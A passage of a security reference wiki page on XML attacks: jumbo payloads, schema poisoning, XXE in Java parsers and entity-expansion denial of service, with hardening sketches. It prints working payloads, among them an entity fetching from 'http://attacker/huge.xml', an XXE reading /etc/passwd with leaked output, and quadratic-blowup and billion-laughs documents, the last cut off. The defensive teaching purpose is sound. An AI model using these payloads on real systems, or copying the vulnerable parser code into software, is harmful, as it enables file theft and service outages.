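A minimal sketch of a bounded alternative follows. The limit of 100 &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements per &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt; is an assumption made for illustration; an appropriate value depends on what the application can process safely:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;&amp;lt;nowiki&amp;gt;http://www.w3.org/2001/XMLSchema&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''100'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;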
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;&amp;lt;nowiki&amp;gt;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;lt;/nowiki&amp;gt;&amp;quot; XMLNS:EXT=&amp;quot;&amp;lt;nowiki&amp;gt;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''&amp;lt;nowiki&amp;gt;http://attacker/huge.xml&amp;lt;/nowiki&amp;gt;'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available on the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the &amp;lt;tt&amp;gt;note&amp;lt;/tt&amp;gt; element could be removed or altered, allowing an attacker to send any type of data to the server. Furthermore, if the server processes external entities, the attacker could use the schema to, for example, read files from the server. An embedded schema only serves as a suggestion for how to structure a document; to be used safely, there must be a way to check its integrity.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not have the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
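A permission problem like the one above could be detected before the schema is used. The following Java sketch assumes a POSIX filesystem (on other filesystems &amp;lt;tt&amp;gt;Files.getPosixFilePermissions&amp;lt;/tt&amp;gt; throws an exception); the class name &amp;lt;tt&amp;gt;SchemaPermissionCheck&amp;lt;/tt&amp;gt; and the method &amp;lt;tt&amp;gt;isWorldWritable&amp;lt;/tt&amp;gt; are hypothetical names chosen for this illustration.&lt;br /&gt;
&lt;br /&gt;
```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.nio.file.attribute.PosixFilePermission;

public class SchemaPermissionCheck {
    // Returns true when users outside the owner and group can modify the file.
    public static boolean isWorldWritable(Path schema) throws IOException {
        return Files.getPosixFilePermissions(schema)
                    .contains(PosixFilePermission.OTHERS_WRITE);
    }

    public static void main(String[] args) throws IOException {
        // Defaults to the note.dtd file from the example; another path can be given as the first argument.
        Path schema = Paths.get(args.length > 0 ? args[0] : "note.dtd");
        if (isWorldWritable(schema)) {
            System.err.println("Refusing to use " + schema + ": writable by any user");
        } else {
            System.out.println(schema + " is not world-writable");
        }
    }
}
```
&lt;br /&gt;
This check only covers the last permission triplet; a stricter policy might also reject group-writable schemas or verify the owner of the file.&lt;br /&gt;
&lt;br /&gt;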
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker could sniff the connection and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, example.com resolves to the IP address 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may actually be retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
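One way to notice that a remotely hosted schema has been altered, whatever the cause, is to compare it against a digest recorded when the schema was last reviewed. The following Java sketch is an assumption-laden illustration: the class name &amp;lt;tt&amp;gt;SchemaPin&amp;lt;/tt&amp;gt;, its methods, and the idea that a trusted digest is available through a separate channel are not part of the original text.&lt;br /&gt;
&lt;br /&gt;
```java
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

public class SchemaPin {
    // Hex-encoded SHA-256 digest of the schema bytes.
    public static String sha256Hex(byte[] content) throws NoSuchAlgorithmException {
        byte[] digest = MessageDigest.getInstance("SHA-256").digest(content);
        StringBuilder hex = new StringBuilder();
        for (byte b : digest) {
            hex.append(String.format("%02x", b));
        }
        return hex.toString();
    }

    // True only when the fetched schema matches the digest recorded earlier.
    public static boolean matchesPin(byte[] content, String pinnedHex) throws NoSuchAlgorithmException {
        byte[] actual = sha256Hex(content).getBytes(StandardCharsets.US_ASCII);
        byte[] expected = pinnedHex.toLowerCase().getBytes(StandardCharsets.US_ASCII);
        return MessageDigest.isEqual(actual, expected);
    }

    public static void main(String[] args) throws Exception {
        // Hypothetical usage: java SchemaPin note.dtd PINNED_DIGEST
        byte[] schema = Files.readAllBytes(Paths.get(args[0]));
        System.out.println(matchesPin(schema, args[1]) ? "schema unchanged" : "schema was modified");
    }
}
```
&lt;br /&gt;
A check like this detects modifications but does not prevent them, and it is only as trustworthy as the channel used to obtain the pinned digest.&lt;br /&gt;
&lt;br /&gt;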
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Sample Vulnerable Java Implementations === &lt;br /&gt;
Using the DTD capability of referencing local or remote files, it is possible to affect confidentiality. It is also possible to affect the availability of resources if no proper restrictions have been set on entity expansion. Consider the following example of an XXE.&lt;br /&gt;
&lt;br /&gt;
'''Sample XML'''&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;contacts&amp;gt;&lt;br /&gt;
  &amp;lt;contact&amp;gt;&lt;br /&gt;
   &amp;lt;firstname&amp;gt;John&amp;lt;/firstname&amp;gt; &lt;br /&gt;
   &amp;lt;lastname&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/lastname&amp;gt;&lt;br /&gt;
  &amp;lt;/contact&amp;gt; &lt;br /&gt;
 &amp;lt;/contacts&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Sample DTD'''&lt;br /&gt;
 &amp;lt;!ELEMENT contacts (contact*)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT contact (firstname,lastname)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT firstname (#PCDATA)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT lastname ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY xxe SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== XXE using DOM ====&lt;br /&gt;
 import java.io.IOException;&lt;br /&gt;
 import javax.xml.parsers.DocumentBuilder;&lt;br /&gt;
 import javax.xml.parsers.DocumentBuilderFactory;&lt;br /&gt;
 import javax.xml.parsers.ParserConfigurationException;&lt;br /&gt;
 import org.xml.sax.InputSource;&lt;br /&gt;
 import org.w3c.dom.Document;&lt;br /&gt;
 import org.w3c.dom.Element;&lt;br /&gt;
 import org.w3c.dom.Node;&lt;br /&gt;
 import org.w3c.dom.NodeList;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   try {&lt;br /&gt;
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();&lt;br /&gt;
    DocumentBuilder builder = factory.newDocumentBuilder();&lt;br /&gt;
    Document doc = builder.parse(new InputSource(&amp;quot;contacts.xml&amp;quot;));&lt;br /&gt;
    NodeList nodeLst = doc.getElementsByTagName(&amp;quot;contact&amp;quot;);&lt;br /&gt;
    for (int s = 0; s &amp;lt; nodeLst.getLength(); s++) {&lt;br /&gt;
      Node fstNode = nodeLst.item(s);&lt;br /&gt;
      if (fstNode.getNodeType() == Node.ELEMENT_NODE) {&lt;br /&gt;
        Element fstElmnt = (Element) fstNode;&lt;br /&gt;
        NodeList fstNmElmntLst = fstElmnt.getElementsByTagName(&amp;quot;firstname&amp;quot;);&lt;br /&gt;
        Element fstNmElmnt = (Element) fstNmElmntLst.item(0);&lt;br /&gt;
        NodeList fstNm = fstNmElmnt.getChildNodes();&lt;br /&gt;
        System.out.println(&amp;quot;First Name: &amp;quot;  + ((Node) fstNm.item(0)).getNodeValue());&lt;br /&gt;
        NodeList lstNmElmntLst = fstElmnt.getElementsByTagName(&amp;quot;lastname&amp;quot;);&lt;br /&gt;
        Element lstNmElmnt = (Element) lstNmElmntLst.item(0);&lt;br /&gt;
        NodeList lstNm = lstNmElmnt.getChildNodes();&lt;br /&gt;
        System.out.println(&amp;quot;Last Name: &amp;quot; + ((Node) lstNm.item(0)).getNodeValue());&lt;br /&gt;
      }&lt;br /&gt;
     }&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
     e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ javac parseDocument.java ; java parseDocument&lt;br /&gt;
 First Name: John&lt;br /&gt;
 Last Name: '''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
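As a hedged counterpart to the vulnerable DOM example above, the following sketch shows one way the factory could be configured to reject documents that carry a DOCTYPE. The class name &amp;lt;tt&amp;gt;SafeDomParser&amp;lt;/tt&amp;gt; and the method &amp;lt;tt&amp;gt;hardenedFactory&amp;lt;/tt&amp;gt; are illustrative names, and the &amp;lt;tt&amp;gt;disallow-doctype-decl&amp;lt;/tt&amp;gt; feature is specific to Xerces-based parsers such as the JDK default, so other implementations may need different settings.&lt;br /&gt;
&lt;br /&gt;
```java
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;

public class SafeDomParser {
    // Feature name understood by Xerces-based parsers, including the JDK default.
    static final String DISALLOW_DOCTYPE =
        "http://apache.org/xml/features/disallow-doctype-decl";

    public static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Reject any document that carries a DOCTYPE, so no entity can be declared.
        factory.setFeature(DISALLOW_DOCTYPE, true);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        return factory;
    }

    public static void main(String[] args) {
        try {
            DocumentBuilder builder = hardenedFactory().newDocumentBuilder();
            Document doc = builder.parse("contacts.xml");
            System.out.println("Parsed root: " + doc.getDocumentElement().getNodeName());
        } catch (Exception e) {
            // contacts.xml from the sample declares a DOCTYPE, so a parse error is expected here.
            System.out.println("Rejected: " + e.getMessage());
        }
    }
}
```
&lt;br /&gt;
Rejecting the DOCTYPE outright is the bluntest option; applications that genuinely need DTDs would have to restrict external entity resolution instead.&lt;br /&gt;
&lt;br /&gt;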
==== XXE using DOM4J ====&lt;br /&gt;
 import org.dom4j.Document;&lt;br /&gt;
 import org.dom4j.DocumentException;&lt;br /&gt;
 import org.dom4j.io.SAXReader;&lt;br /&gt;
 import org.dom4j.io.OutputFormat;&lt;br /&gt;
 import org.dom4j.io.XMLWriter;&lt;br /&gt;
&lt;br /&gt;
 public class test1 {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   Document document = null;&lt;br /&gt;
   try {&lt;br /&gt;
    SAXReader reader = new SAXReader();&lt;br /&gt;
    document = reader.read(&amp;quot;contacts.xml&amp;quot;);&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   } &lt;br /&gt;
   OutputFormat format = OutputFormat.createPrettyPrint();&lt;br /&gt;
   try {&lt;br /&gt;
    XMLWriter writer = new XMLWriter( System.out, format );&lt;br /&gt;
    writer.write( document );&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java test1&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;contacts&amp;gt;&lt;br /&gt;
  &amp;lt;contact&amp;gt;&lt;br /&gt;
   &amp;lt;firstname&amp;gt;John&amp;lt;/firstname&amp;gt;&lt;br /&gt;
   &amp;lt;lastname&amp;gt;'''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using SAX ====&lt;br /&gt;
 import java.io.IOException;&lt;br /&gt;
 import javax.xml.parsers.SAXParser;&lt;br /&gt;
 import javax.xml.parsers.SAXParserFactory;&lt;br /&gt;
 import org.xml.sax.SAXException;&lt;br /&gt;
 import org.xml.sax.helpers.DefaultHandler;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument extends DefaultHandler {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   new parseDocument();&lt;br /&gt;
  }&lt;br /&gt;
  public parseDocument() {&lt;br /&gt;
   try {&lt;br /&gt;
    SAXParserFactory factory = SAXParserFactory.newInstance();&lt;br /&gt;
    SAXParser parser = factory.newSAXParser();&lt;br /&gt;
    parser.parse(&amp;quot;contacts.xml&amp;quot;, this);&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
  @Override&lt;br /&gt;
  public void characters(char[] ac, int i, int j) throws SAXException {&lt;br /&gt;
   String tmpValue = new String(ac, i, j);&lt;br /&gt;
   System.out.println(tmpValue);&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java parseDocument&lt;br /&gt;
 John&lt;br /&gt;
 '''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using StAX ====&lt;br /&gt;
 import javax.xml.stream.XMLStreamReader;&lt;br /&gt;
 import javax.xml.stream.XMLInputFactory;&lt;br /&gt;
 import java.io.File;&lt;br /&gt;
 import java.io.FileInputStream;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   try {&lt;br /&gt;
    XMLInputFactory xmlif = XMLInputFactory.newInstance();&lt;br /&gt;
    File file = new File(&amp;quot;contacts.xml&amp;quot;);&lt;br /&gt;
    // The first argument is the system ID, used to resolve the relative reference to contacts.dtd&lt;br /&gt;
    XMLStreamReader xmlfer = xmlif.createXMLStreamReader(&amp;quot;contacts.xml&amp;quot;, new FileInputStream(file));&lt;br /&gt;
    while (xmlfer.hasNext()) {&lt;br /&gt;
     xmlfer.next();&lt;br /&gt;
     if (xmlfer.hasText()) {&lt;br /&gt;
      System.out.print(xmlfer.getText());&lt;br /&gt;
     }&lt;br /&gt;
    }&lt;br /&gt;
    xmlfer.close();&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java parseDocument&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;'''John### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
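For the StAX case, the standard &amp;lt;tt&amp;gt;XMLInputFactory&amp;lt;/tt&amp;gt; properties offer a comparable switch. The sketch below is a minimal illustration with hypothetical names (&amp;lt;tt&amp;gt;SafeStaxFactory&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;hardenedFactory&amp;lt;/tt&amp;gt;); how a given implementation then treats an undeclared entity reference, such as by leaving it unexpanded or raising an error, may vary.&lt;br /&gt;
&lt;br /&gt;
```java
import javax.xml.stream.XMLInputFactory;

public class SafeStaxFactory {
    public static XMLInputFactory hardenedFactory() {
        XMLInputFactory factory = XMLInputFactory.newInstance();
        // Do not process DTDs at all.
        factory.setProperty(XMLInputFactory.SUPPORT_DTD, Boolean.FALSE);
        // Do not resolve external entities even if a DTD is somehow processed.
        factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, Boolean.FALSE);
        return factory;
    }

    public static void main(String[] args) {
        XMLInputFactory factory = hardenedFactory();
        System.out.println("DTD support: "
            + factory.getProperty(XMLInputFactory.SUPPORT_DTD));
        System.out.println("External entities: "
            + factory.getProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES));
    }
}
```
&lt;br /&gt;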
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; references another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is in turn defined as entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000*100,000 (10^10) characters in memory.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
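The asymmetry between what the attacker sends and what the parser must hold in memory can be worked out directly. The following Java sketch is a back-of-the-envelope calculation only; the class and method names are hypothetical, and it ignores the few bytes of surrounding markup.&lt;br /&gt;
&lt;br /&gt;
```java
public class QuadraticBlowup {
    // Approximate size of the document: the entity value once,
    // plus one three-character reference per use.
    public static long payloadChars(long entityLength, long references) {
        return entityLength + 3L * references;
    }

    // Size after expansion: every reference is replaced by the full entity value.
    public static long expandedChars(long entityLength, long references) {
        return entityLength * references;
    }

    public static void main(String[] args) {
        long n = 100_000L;
        long sent = payloadChars(n, n);
        long expanded = expandedChars(n, n);
        System.out.println("Characters sent:     " + sent);
        System.out.println("Characters expanded: " + expanded);
        System.out.println("Amplification:       " + (expanded / sent) + "x");
    }
}
```
&lt;br /&gt;
With the figures from the example above, roughly 400,000 characters of input expand to 10,000,000,000 characters.&lt;br /&gt;
&lt;br /&gt;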
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities included within the following code, the application will start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
